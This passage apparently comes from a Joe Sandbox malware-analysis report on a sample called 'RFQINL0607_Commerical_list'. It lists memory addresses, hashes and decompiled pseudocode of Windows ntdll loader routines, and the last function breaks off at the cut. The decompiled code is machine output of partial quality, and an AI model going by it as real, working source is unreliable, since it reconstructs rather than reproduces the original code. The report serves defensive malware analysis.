                                                                                                                                                                                  0x33360808
                                                                                                                                                                                  0x333b5053
                                                                                                                                                                                  0x33360816
                                                                                                                                                                                  0x33360816
                                                                                                                                                                                  0x33360818
                                                                                                                                                                                  0x33360818
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x33360808
                                                                                                                                                                                  0x333607ee
                                                                                                                                                                                  0x33360789
                                                                                                                                                                                  0x33360789
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x33360789
                                                                                                                                                                                  0x33360732
                                                                                                                                                                                  0x33360736
                                                                                                                                                                                  0x333b4f63
                                                                                                                                                                                  0x333b4f66
                                                                                                                                                                                  0x333b4f66
                                                                                                                                                                                  0x333b4f6b
                                                                                                                                                                                  0x333b4f6d
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x333b4f76
                                                                                                                                                                                  0x333b4f79
                                                                                                                                                                                  0x333b4f7b
                                                                                                                                                                                  0x333b4f8d
                                                                                                                                                                                  0x333b4f92
                                                                                                                                                                                  0x333b4f92
                                                                                                                                                                                  0x333b4f95
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x333b4f95
                                                                                                                                                                                  0x3336073c
                                                                                                                                                                                  0x33360742
                                                                                                                                                                                  0x3336074b
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x3336074b
                                                                                                                                                                                  0x333606ff

                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000002.00000002.11643698870.0000000033320000.00000040.00001000.00020000.00000000.sdmp, Offset: 33320000, based on PE: true
                                                                                                                                                                                  • Associated: 00000002.00000002.11643698870.0000000033449000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.11643698870.000000003344D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_33320000_RFQINL0607_Commerical_list.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID: (UCRBlock->Size >= *Size)$HEAP: $HEAP[%wZ]:
                                                                                                                                                                                  • API String ID: 0-4253913091
                                                                                                                                                                                  • Opcode ID: e898b5208817ba2015c3d2e29d4ddf42618d73c83ca2e89dd46be89888dd6200
                                                                                                                                                                                  • Instruction ID: bd7ae4a9cbdbf1e9437d5e5a80a44daeebd30c0eddc3849bfc4f10f78c7c8aab
                                                                                                                                                                                  • Opcode Fuzzy Hash: e898b5208817ba2015c3d2e29d4ddf42618d73c83ca2e89dd46be89888dd6200
                                                                                                                                                                                  • Instruction Fuzzy Hash: 30F19974A04705DFEB05CF68C881BAAB7F9FF44344F1481A8E4559BB95DB38E981CB90
                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                  Function 33379723 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 179timeCOMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  C-Code - Quality: 66%
                                                                                                                                                                                  			E33379723(signed int __ecx, void* __edx) {
				char _v4;
				intOrPtr* _v8;
				signed int _v12;
				signed int _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr* _v28;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				intOrPtr _t49;
				signed int _t50;
				signed int _t60;
				signed int _t69;
				signed int _t70;
				intOrPtr _t79;
				signed int _t82;
				signed int _t83;
				intOrPtr* _t85;
				intOrPtr _t86;
				signed int _t87;
				void* _t88;
				signed int _t89;
				signed int _t93;
				signed int _t99;
				signed int* _t100;
				void* _t102;
				void* _t103;
				signed int _t104;
				intOrPtr* _t105;
				void* _t107;
				signed int _t108;
				intOrPtr* _t110;
				signed int _t112;
				signed int _t113;
				void* _t115;

				_t87 = __ecx;
				_t115 = (_t113 & 0xfffffff8) - 0x14;
				_t110 = __ecx;
				_v16 =  *[fs:0x30];
				_t82 = 0;
				_v12 = __ecx;
				_push(_t103);
				if( *((intOrPtr*)(__ecx + 0x20)) == 0xfffffffc) {
					L9:
					_t13 = _t110 + 0x20;
					 *_t13 =  *(_t110 + 0x20) | 0xffffffff;
					__eflags =  *_t13;
					E3337A4E3(_t82, _t87, _t103, _t110,  *_t13);
					L10:
					__eflags =  *0x334465f0 - _t82; // 0x0
					if(__eflags != 0) {
						_t99 =  *0x7ffe0330;
						_t83 =  *0x33449214; // 0x0
						_t88 = 0x20;
						_t87 = _t88 - (_t99 & 0x0000001f);
						asm("ror ebx, cl");
						_t82 = _t83 ^ _t99;
					}
					E3335FED0(0x334432d8);
					_t49 =  *_t110;
					while(1) {
						_v20 = _t49;
						__eflags = _t49 - _t110;
						if(_t49 == _t110) {
							break;
						}
						_t16 = _t49 - 0x54; // 0x779c36a0
						_t108 = _t16;
						__eflags =  *(_t108 + 0x34) & 0x00000008;
						if(( *(_t108 + 0x34) & 0x00000008) != 0) {
							_push(_t87);
							_t102 = 2;
							L33370C2C(_t108, _t102);
							__eflags = _t82;
							if(_t82 != 0) {
								 *0x334491e0(_t108);
								 *_t82();
							}
							_t87 = _t108;
							E333598DE(_t87, "true");
							_t79 = _v24;
							__eflags =  *(_t79 + 0x68) & 0x00000100;
							if(( *(_t79 + 0x68) & 0x00000100) != 0) {
								_t87 = _t108;
								E333D85AA(_t87);
							}
						}
						__eflags =  *0x334437c0 & 0x00000005;
						if(__eflags != 0) {
							_t43 = _t108 + 0x24; // -48
							E333CE692("minkernel\\ntdll\\ldrsnap.c", 0xcdd, "LdrpUnloadNode", 2, "Unmapping DLL \"%wZ\"\n", _t43);
							_t115 = _t115 + 0x18;
						}
						_push(0);
						_push( *((intOrPtr*)(_t108 + 0x18)));
						E3337A390(_t82, _t87, _t108, _t110, __eflags);
						_t49 =  *_v28;
					}
					_push(0x334432d8);
					_t50 = E3335E740(_t87);
					while(1) {
						L3:
						_t89 =  *(_t110 + 0x18);
						if(_t89 == 0) {
							break;
						}
						_t104 =  *_t89;
						__eflags = _t104 - _t89;
						if(_t104 != _t89) {
							_t50 =  *_t104;
							 *_t89 = _t50;
						} else {
							_t32 = _t110 + 0x18;
							 *_t32 =  *(_t110 + 0x18) & 0x00000000;
							__eflags =  *_t32;
						}
						__eflags = _t104;
						if(_t104 == 0) {
							break;
						} else {
							L33362330(_t50, 0x33446668);
							_t86 =  *((intOrPtr*)(_t104 + 4));
							_t35 = _t104 + 8; // 0x8
							_t100 = _t35;
							_t93 =  *(_t86 + 0x1c);
							_t60 =  *_t93;
							_v16 = _t60;
							__eflags = _t60 - _t100;
							if(_t60 == _t100) {
								L27:
								 *_t93 =  *_t100;
								__eflags =  *(_t86 + 0x1c) - _t100;
								if(__eflags == 0) {
									asm("sbb eax, eax");
									_t69 =  ~(_t93 - _t100) & _t93;
									__eflags = _t69;
									 *(_t86 + 0x1c) = _t69;
								}
								_push( &_v4);
								E3336D963(_t86, _t86, 0, _t104, _t110, __eflags);
								E333624D0(0x33446668);
								__eflags = _v12;
								if(_v12 != 0) {
									E33379723(_t86, 0);
								}
								_t50 = E33363BC0( *0x33445d74, 0, _t104);
								continue;
							}
							_t112 = _t60;
							do {
								_t70 =  *_t112;
								_t93 = _t112;
								_t112 = _t70;
								__eflags = _t70 - _t100;
							} while (_t70 != _t100);
							_t110 = _v8;
							goto L27;
						}
					}
					_t105 =  *_t110;
					 *(_t110 + 0x20) = 0xfffffffe;
					if(_t105 == _t110) {
						L8:
						return _t50;
					} else {
						goto L5;
					}
					do {
						L5:
						_t85 =  *_t105;
						_t107 = _t105 + 0xffffffac;
						 *(_t107 + 0x34) =  *(_t107 + 0x34) | 0x00000002;
						E33379938(L33362330(_t50, 0x33446668), _t107);
						if(( *(_t107 + 0x34) & 0x00000080) != 0) {
							_t28 = _t107 + 0x74; // -56
							L33379B40(_t85, _t107, _t110, 0x334467ac);
							_t29 = _t107 + 0x68; // -68
							L33379B40(_t85, _t107, _t110, 0x334467a4);
							 *(_t107 + 0x20) =  *(_t107 + 0x20) & 0x00000000;
						}
						E333624D0(0x33446668);
						if( *0x33445d70 != 0) {
							E3338680F(_t107);
						}
						_t50 = E3336D3E1(_t85, _t107, _t110);
						_t105 = _t85;
					} while (_t85 != _t110);
					goto L8;
				}
				if( *((intOrPtr*)(__ecx + 0x20)) == 7) {
					goto L10;
				}
				if( *((intOrPtr*)(__ecx + 0x20)) == 9) {
					goto L9;
				}
				goto L3;
			}








































                                                                                                                                                                                  0x33379723
                                                                                                                                                                                  0x3337972b
                                                                                                                                                                                  0x33379736
                                                                                                                                                                                  0x33379738
                                                                                                                                                                                  0x3337973c
                                                                                                                                                                                  0x3337973e
                                                                                                                                                                                  0x33379742
                                                                                                                                                                                  0x33379747
                                                                                                                                                                                  0x333797bc
                                                                                                                                                                                  0x333797bc
                                                                                                                                                                                  0x333797bc
                                                                                                                                                                                  0x333797bc
                                                                                                                                                                                  0x333797c0
                                                                                                                                                                                  0x333797c5
                                                                                                                                                                                  0x333797c5
                                                                                                                                                                                  0x333797cb
                                                                                                                                                                                  0x33379900
                                                                                                                                                                                  0x33379908
                                                                                                                                                                                  0x33379913
                                                                                                                                                                                  0x33379914
                                                                                                                                                                                  0x33379916
                                                                                                                                                                                  0x33379918
                                                                                                                                                                                  0x33379918
                                                                                                                                                                                  0x333797d6
                                                                                                                                                                                  0x333797db
                                                                                                                                                                                  0x333797dd
                                                                                                                                                                                  0x333797dd
                                                                                                                                                                                  0x333797e1
                                                                                                                                                                                  0x333797e3
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x333797e5
                                                                                                                                                                                  0x333797e5
                                                                                                                                                                                  0x333797e8
                                                                                                                                                                                  0x333797ec
                                                                                                                                                                                  0x333797ee
                                                                                                                                                                                  0x333797f1
                                                                                                                                                                                  0x333797f4
                                                                                                                                                                                  0x333797f9
                                                                                                                                                                                  0x333797fb
                                                                                                                                                                                  0x33379922
                                                                                                                                                                                  0x33379928
                                                                                                                                                                                  0x33379928
                                                                                                                                                                                  0x33379803
                                                                                                                                                                                  0x33379805
                                                                                                                                                                                  0x3337980a
                                                                                                                                                                                  0x3337980e
                                                                                                                                                                                  0x33379815
                                                                                                                                                                                  0x333bdade
                                                                                                                                                                                  0x333bdae0
                                                                                                                                                                                  0x333bdae0
                                                                                                                                                                                  0x33379815
                                                                                                                                                                                  0x3337981b
                                                                                                                                                                                  0x33379822
                                                                                                                                                                                  0x333bdaea
                                                                                                                                                                                  0x333bdb04
                                                                                                                                                                                  0x333bdb09
                                                                                                                                                                                  0x333bdb09
                                                                                                                                                                                  0x33379828
                                                                                                                                                                                  0x3337982a
                                                                                                                                                                                  0x3337982d
                                                                                                                                                                                  0x33379836
                                                                                                                                                                                  0x33379836
                                                                                                                                                                                  0x3337983a
                                                                                                                                                                                  0x3337983f
                                                                                                                                                                                  0x33379755
                                                                                                                                                                                  0x33379755
                                                                                                                                                                                  0x33379755
                                                                                                                                                                                  0x3337975a
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x3337986e
                                                                                                                                                                                  0x33379870
                                                                                                                                                                                  0x33379872
                                                                                                                                                                                  0x3337992f
                                                                                                                                                                                  0x33379931
                                                                                                                                                                                  0x33379878
                                                                                                                                                                                  0x33379878
                                                                                                                                                                                  0x33379878
                                                                                                                                                                                  0x33379878
                                                                                                                                                                                  0x33379878
                                                                                                                                                                                  0x3337987c
                                                                                                                                                                                  0x3337987e
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x33379884
                                                                                                                                                                                  0x33379889
                                                                                                                                                                                  0x3337988e
                                                                                                                                                                                  0x33379891
                                                                                                                                                                                  0x33379891
                                                                                                                                                                                  0x33379894
                                                                                                                                                                                  0x33379897
                                                                                                                                                                                  0x33379899
                                                                                                                                                                                  0x3337989d
                                                                                                                                                                                  0x3337989f
                                                                                                                                                                                  0x333798b1
                                                                                                                                                                                  0x333798b3
                                                                                                                                                                                  0x333798b5
                                                                                                                                                                                  0x333798b8
                                                                                                                                                                                  0x333798c0
                                                                                                                                                                                  0x333798c2
                                                                                                                                                                                  0x333798c2
                                                                                                                                                                                  0x333798c4
                                                                                                                                                                                  0x333798c4
                                                                                                                                                                                  0x333798cd
                                                                                                                                                                                  0x333798d0
                                                                                                                                                                                  0x333798da
                                                                                                                                                                                  0x333798df
                                                                                                                                                                                  0x333798e4
                                                                                                                                                                                  0x333798e8
                                                                                                                                                                                  0x333798e8
                                                                                                                                                                                  0x333798f6
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x333798f6
                                                                                                                                                                                  0x333798a1
                                                                                                                                                                                  0x333798a3
                                                                                                                                                                                  0x333798a3
                                                                                                                                                                                  0x333798a5
                                                                                                                                                                                  0x333798a7
                                                                                                                                                                                  0x333798a9
                                                                                                                                                                                  0x333798a9
                                                                                                                                                                                  0x333798ad
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x333798ad
                                                                                                                                                                                  0x3337987e
                                                                                                                                                                                  0x33379760
                                                                                                                                                                                  0x33379762
                                                                                                                                                                                  0x3337976b
                                                                                                                                                                                  0x333797b5
                                                                                                                                                                                  0x333797bb
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x3337976d
                                                                                                                                                                                  0x3337976d
                                                                                                                                                                                  0x3337976d
                                                                                                                                                                                  0x3337976f
                                                                                                                                                                                  0x33379777
                                                                                                                                                                                  0x33379782
                                                                                                                                                                                  0x3337978b
                                                                                                                                                                                  0x33379849
                                                                                                                                                                                  0x33379852
                                                                                                                                                                                  0x33379857
                                                                                                                                                                                  0x33379860
                                                                                                                                                                                  0x33379865
                                                                                                                                                                                  0x33379865
                                                                                                                                                                                  0x33379796
                                                                                                                                                                                  0x333797a2
                                                                                                                                                                                  0x333bdb13
                                                                                                                                                                                  0x333bdb13
                                                                                                                                                                                  0x333797aa
                                                                                                                                                                                  0x333797af
                                                                                                                                                                                  0x333797b1
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x3337976d
                                                                                                                                                                                  0x3337974d
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x33379753
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000

                                                                                                                                                                                  APIs
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000002.00000002.11643698870.0000000033320000.00000040.00001000.00020000.00000000.sdmp, Offset: 33320000, based on PE: true
                                                                                                                                                                                  • Associated: 00000002.00000002.11643698870.0000000033449000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.11643698870.000000003344D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_33320000_RFQINL0607_Commerical_list.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: DebugPrintTimes
                                                                                                                                                                                  • String ID: LdrpUnloadNode$Unmapping DLL "%wZ"$minkernel\ntdll\ldrsnap.c
                                                                                                                                                                                  • API String ID: 3446177414-2283098728
                                                                                                                                                                                  • Opcode ID: 47dc048b2e6be9612f2cb5561b133a875b4030c6e16d1d914c32163c555da8f6
                                                                                                                                                                                  • Instruction ID: 65218acc255d88a8610ca89204f04bfef413f49ee00e74329764126ac3f740f2
                                                                                                                                                                                  • Opcode Fuzzy Hash: 47dc048b2e6be9612f2cb5561b133a875b4030c6e16d1d914c32163c555da8f6
                                                                                                                                                                                  • Instruction Fuzzy Hash: 3F510171A44301AFE710DF38CCC0A5977E9BF84314F18C76DE4919BA91EB78A844CB82
                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                  Function 3338C640 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 141timeCOMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  C-Code - Quality: 54%
                                                                                                                                                                                  			E3338C640(void* __ebx, signed int __ecx, void* __edx, void* __edi) {
				signed int _v20;
				signed int _v36;
				char _v544;
				char _v552;
				char _v556;
				char* _v560;
				short _v562;
				signed int _v564;
				short _v570;
				char _v572;
				signed int _v580;
				char _v588;
				signed int _v604;
				signed short _v608;
				void* __esi;
				void* __ebp;
				void* _t25;
				signed int* _t27;
				signed int _t39;
				signed int _t42;
				signed int _t54;
				signed char _t56;
				signed int* _t58;
				intOrPtr* _t65;
				signed int _t67;
				void* _t70;
				signed int _t72;
				signed int _t75;
				void* _t77;
				signed int _t80;
				void* _t82;
				signed int _t85;
				signed int _t87;

				_t70 = __edx;
				_push(__ebx);
				_push(__edi);
				_t72 = __ecx;
				_t25 = E33370130();
				if(_t25 != 0) {
					L33362330(_t25, 0x33445b5c);
					_t27 =  *0x33449224; // 0x0
					_t75 =  *_t27;
					__eflags = _t72;
					if(_t72 != 0) {
						__eflags = _t75;
						if(_t75 == 0) {
							goto L13;
						} else {
							_t80 = _t75 - 1;
							goto L7;
						}
					} else {
						__eflags = _t75;
						if(_t75 == 0) {
							E33349050( *0x3344921c, _t75);
						}
						__eflags = _t75 - 0xffffffff;
						if(_t75 == 0xffffffff) {
							L13:
							E333624D0(0x33445b5c);
							_t65 = 0xe;
							asm("int 0x29");
							_t87 = (_t85 & 0xfffffff8) - 0x224;
							_v20 =  *0x3344b370 ^ _t87;
							_t76 = _t65;
							 *0x334491e0( &_v544, 0x104, _t75, _t82);
							_t67 =  *_t65() + _t33;
							__eflags = _t67;
							if(_t67 != 0) {
								__eflags =  *0x3344660c;
								_v560 =  &_v552;
								_v564 = _t67;
								_v562 = 0x208;
								if(__eflags == 0) {
									L25:
									_push( &_v556);
									_push( &_v564);
									E333DCB20(0x33445b5c, _t72, _t76, __eflags);
									goto L15;
								} else {
									_t76 = ( *0x33446608 & 0x0000ffff) + 2 + _t67;
									_t42 = L33365D90(_t67,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t76);
									_v580 = _t42;
									__eflags = _t42;
									if(_t42 != 0) {
										__eflags = 0;
										_v570 = _t76;
										_v572 = 0;
										E333710D0(_t67,  &_v572, 0x33446608);
										E333710D0(_t67,  &_v580,  &_v572);
										E3335FE40(_t67,  &_v588, ";");
										E33363BC0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0,  *0x3344660c);
										 *0x33446608 = _v608;
										_t54 = _v604;
										 *0x3344660c = _t54;
										 *0x33446604 = _t54;
										E333DD4A0(_t67, __eflags);
										goto L25;
									} else {
										_t56 =  *0x334437c0; // 0x0
										__eflags = _t56 & 0x00000003;
										if((_t56 & 0x00000003) != 0) {
											_push("Failed to reallocate the system dirs string !\n");
											_push(0);
											_push("LdrpInitializePerUserWindowsDirectory");
											_push(0xcf4);
											_push("minkernel\\ntdll\\ldrinit.c");
											E333CE692();
											_t56 =  *0x334437c0; // 0x0
											_t87 = _t87 + 0x14;
										}
										__eflags = _t56 & 0x00000010;
										if((_t56 & 0x00000010) != 0) {
											asm("int3");
										}
										_t39 = 0xc0000017;
									}
								}
							} else {
								L15:
								_t39 = 0;
								__eflags = 0;
							}
							_pop(_t77);
							__eflags = _v36 ^ _t87;
							return E33394B50(_t39, 0x33445b5c, _v36 ^ _t87, _t70, _t72, _t77);
						} else {
							_t80 = _t75 + 1;
							__eflags = _t80;
							L7:
							_t58 =  *0x33449224; // 0x0
							 *_t58 = _t80;
							__eflags = _t72;
							if(_t72 != 0) {
								__eflags = _t80;
								if(_t80 == 0) {
									E33349050( *0x3344921c, "true");
								}
							}
							_t25 = E333624D0(0x33445b5c);
							goto L1;
						}
					}
				} else {
					L1:
					return _t25;
				}
			}




































                                                                                                                                                                                  0x3338c640
                                                                                                                                                                                  0x3338c642
                                                                                                                                                                                  0x3338c644
                                                                                                                                                                                  0x3338c645
                                                                                                                                                                                  0x3338c647
                                                                                                                                                                                  0x3338c64e
                                                                                                                                                                                  0x3338c65a
                                                                                                                                                                                  0x3338c65f
                                                                                                                                                                                  0x3338c664
                                                                                                                                                                                  0x3338c666
                                                                                                                                                                                  0x3338c668
                                                                                                                                                                                  0x3338c6a4
                                                                                                                                                                                  0x3338c6a6
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x3338c6a8
                                                                                                                                                                                  0x3338c6a8
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x3338c6a8
                                                                                                                                                                                  0x3338c66a
                                                                                                                                                                                  0x3338c66a
                                                                                                                                                                                  0x3338c66c
                                                                                                                                                                                  0x3338c675
                                                                                                                                                                                  0x3338c675
                                                                                                                                                                                  0x3338c67a
                                                                                                                                                                                  0x3338c67d
                                                                                                                                                                                  0x3338c6ab
                                                                                                                                                                                  0x3338c6ac
                                                                                                                                                                                  0x3338c6b3
                                                                                                                                                                                  0x3338c6b4
                                                                                                                                                                                  0x3338c6be
                                                                                                                                                                                  0x3338c6cb
                                                                                                                                                                                  0x3338c6dc
                                                                                                                                                                                  0x3338c6df
                                                                                                                                                                                  0x3338c6e9
                                                                                                                                                                                  0x3338c6e9
                                                                                                                                                                                  0x3338c6eb
                                                                                                                                                                                  0x333c8090
                                                                                                                                                                                  0x333c809b
                                                                                                                                                                                  0x333c80a4
                                                                                                                                                                                  0x333c80a9
                                                                                                                                                                                  0x333c80ae
                                                                                                                                                                                  0x333c817f
                                                                                                                                                                                  0x333c8183
                                                                                                                                                                                  0x333c8188
                                                                                                                                                                                  0x333c8189
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x333c80b4
                                                                                                                                                                                  0x333c80c4
                                                                                                                                                                                  0x333c80cc
                                                                                                                                                                                  0x333c80d1
                                                                                                                                                                                  0x333c80d5
                                                                                                                                                                                  0x333c80d7
                                                                                                                                                                                  0x333c8114
                                                                                                                                                                                  0x333c8116
                                                                                                                                                                                  0x333c811b
                                                                                                                                                                                  0x333c812a
                                                                                                                                                                                  0x333c8139
                                                                                                                                                                                  0x333c8148
                                                                                                                                                                                  0x333c815e
                                                                                                                                                                                  0x333c8167
                                                                                                                                                                                  0x333c816c
                                                                                                                                                                                  0x333c8170
                                                                                                                                                                                  0x333c8175
                                                                                                                                                                                  0x333c817a
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x333c80d9
                                                                                                                                                                                  0x333c80d9
                                                                                                                                                                                  0x333c80de
                                                                                                                                                                                  0x333c80e0
                                                                                                                                                                                  0x333c80e2
                                                                                                                                                                                  0x333c80e7
                                                                                                                                                                                  0x333c80e9
                                                                                                                                                                                  0x333c80ee
                                                                                                                                                                                  0x333c80f3
                                                                                                                                                                                  0x333c80f8
                                                                                                                                                                                  0x333c80fd
                                                                                                                                                                                  0x333c8102
                                                                                                                                                                                  0x333c8102
                                                                                                                                                                                  0x333c8105
                                                                                                                                                                                  0x333c8107
                                                                                                                                                                                  0x333c8109
                                                                                                                                                                                  0x333c8109
                                                                                                                                                                                  0x333c810a
                                                                                                                                                                                  0x333c810a
                                                                                                                                                                                  0x333c80d7
                                                                                                                                                                                  0x3338c6f1
                                                                                                                                                                                  0x3338c6f1
                                                                                                                                                                                  0x3338c6f1
                                                                                                                                                                                  0x3338c6f1
                                                                                                                                                                                  0x3338c6f1
                                                                                                                                                                                  0x3338c6fa
                                                                                                                                                                                  0x3338c6fb
                                                                                                                                                                                  0x3338c705
                                                                                                                                                                                  0x3338c67f
                                                                                                                                                                                  0x3338c67f
                                                                                                                                                                                  0x3338c67f
                                                                                                                                                                                  0x3338c680
                                                                                                                                                                                  0x3338c680
                                                                                                                                                                                  0x3338c685
                                                                                                                                                                                  0x3338c687
                                                                                                                                                                                  0x3338c689
                                                                                                                                                                                  0x3338c68b
                                                                                                                                                                                  0x3338c68d
                                                                                                                                                                                  0x3338c697
                                                                                                                                                                                  0x3338c697
                                                                                                                                                                                  0x3338c68d
                                                                                                                                                                                  0x3338c69d
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x3338c69d
                                                                                                                                                                                  0x3338c67d
                                                                                                                                                                                  0x3338c650
                                                                                                                                                                                  0x3338c650
                                                                                                                                                                                  0x3338c653
                                                                                                                                                                                  0x3338c653

                                                                                                                                                                                  APIs
                                                                                                                                                                                  Strings
                                                                                                                                                                                  • Failed to reallocate the system dirs string !, xrefs: 333C80E2
                                                                                                                                                                                  • LdrpInitializePerUserWindowsDirectory, xrefs: 333C80E9
                                                                                                                                                                                  • minkernel\ntdll\ldrinit.c, xrefs: 333C80F3
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000002.00000002.11643698870.0000000033320000.00000040.00001000.00020000.00000000.sdmp, Offset: 33320000, based on PE: true
                                                                                                                                                                                  • Associated: 00000002.00000002.11643698870.0000000033449000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.11643698870.000000003344D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_33320000_RFQINL0607_Commerical_list.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: DebugPrintTimes
                                                                                                                                                                                  • String ID: Failed to reallocate the system dirs string !$LdrpInitializePerUserWindowsDirectory$minkernel\ntdll\ldrinit.c
                                                                                                                                                                                  • API String ID: 3446177414-1783798831
                                                                                                                                                                                  • Opcode ID: fa4340d4841b5b47afaf3ff059e8c06990cbfb384ee8b8d356291b9890fe25ac
                                                                                                                                                                                  • Instruction ID: 31b53f3e74ec9a9b9c7e131a2df8ee6a7db84a4dca52d3c46ba09f883dffac3d
                                                                                                                                                                                  • Opcode Fuzzy Hash: fa4340d4841b5b47afaf3ff059e8c06990cbfb384ee8b8d356291b9890fe25ac
                                                                                                                                                                                  • Instruction Fuzzy Hash: 4741C0B5945340ABD711EF64CC80B4BB7E8EF44650F08C93AF898EB261EB78D905CB91
                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                  Function 333D43D5 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 121timeCOMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  C-Code - Quality: 50%
                                                                                                                                                                                  			E333D43D5(intOrPtr __ecx, void* __edx, intOrPtr _a4) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				char _v24;
				intOrPtr _v28;
				void* __ebx;
				void* __esi;
				signed char _t37;
				signed int _t41;
				intOrPtr _t44;
				signed int _t49;
				signed int _t50;
				signed int _t51;
				signed int _t52;
				void* _t54;
				signed int _t59;
				signed int _t60;
				signed int _t64;
				signed int _t66;
				intOrPtr _t68;
				signed int _t69;
				intOrPtr _t70;

				_t68 = _a4;
				_t54 = __edx;
				_v28 = __ecx;
				_v24 = E333D4B46(_t68);
				_v12 =  *((intOrPtr*)(_t54 + 0x2c));
				_v8 =  *((intOrPtr*)(_t54 + 0x30));
				_v20 =  *((intOrPtr*)(_t54 + 0x90));
				_t37 =  *0x33446714; // 0x0
				_v16 = _t68;
				_t69 =  *0x33446710; // 0x0
				if((_t37 & 0x00000001) != 0) {
					if(_t69 == 0) {
						_t69 = 0;
						__eflags = 0;
					} else {
						_t69 = _t69 ^ 0x33446710;
					}
				}
				_t64 = _t37 & 1;
				while(_t69 != 0) {
					__eflags = E333D4528(_t54, _t69,  &_v24, _t69);
					if(__eflags >= 0) {
						if(__eflags <= 0) {
							L25:
							while(_t69 != 0) {
								_t41 = E333D4528(_t54, _t69,  &_v24, _t69);
								__eflags = _t41;
								if(_t41 != 0) {
									break;
								}
								_t66 =  *0x33445ca0; // 0x0
								__eflags = _t66;
								if(_t66 == 0) {
									L28:
									__eflags =  *0x334437c0 & 0x00000005;
									_t70 =  *((intOrPtr*)(_t69 + 0x20));
									if(( *0x334437c0 & 0x00000005) != 0) {
										_t44 =  *((intOrPtr*)( *[fs:0x30] + 0x10));
										_push( *((intOrPtr*)(_t44 + 0x2a8)));
										_push( *((intOrPtr*)(_t44 + 0x2a4)));
										_push(_a4);
										_push( *((intOrPtr*)(_t54 + 0x30)));
										_push( *((intOrPtr*)(_t54 + 0x2c)));
										_push( *((intOrPtr*)(_v28 + 0x30)));
										E333CE692("minkernel\\ntdll\\ldrredirect.c", 0x12b, "LdrpCheckRedirection", 2, "Import Redirection: %wZ %wZ!%s redirected to %wZ\n",  *((intOrPtr*)(_v28 + 0x2c)));
									}
									L27:
									return _t70;
								}
								 *0x334491e0( *((intOrPtr*)(_v28 + 0x28)),  *((intOrPtr*)(_t69 + 0x24)));
								_t49 =  *_t66();
								__eflags = _t49;
								if(_t49 != 0) {
									goto L28;
								}
								_t50 =  *(_t69 + 4);
								_t59 = _t69;
								__eflags = _t50;
								if(_t50 == 0) {
									while(1) {
										_t69 =  *(_t69 + 8) & 0xfffffffc;
										__eflags = _t69;
										if(_t69 == 0) {
											goto L25;
										}
										__eflags =  *_t69 - _t59;
										if( *_t69 == _t59) {
											goto L25;
										}
										_t59 = _t69;
									}
									continue;
								}
								_t69 = _t50;
								_t60 =  *_t69;
								__eflags = _t60;
								if(_t60 == 0) {
									continue;
								} else {
									goto L20;
								}
								do {
									L20:
									_t51 =  *_t60;
									_t69 = _t60;
									_t60 = _t51;
									__eflags = _t51;
								} while (_t51 != 0);
							}
							_t70 = 0xffbadd11;
							goto L27;
						}
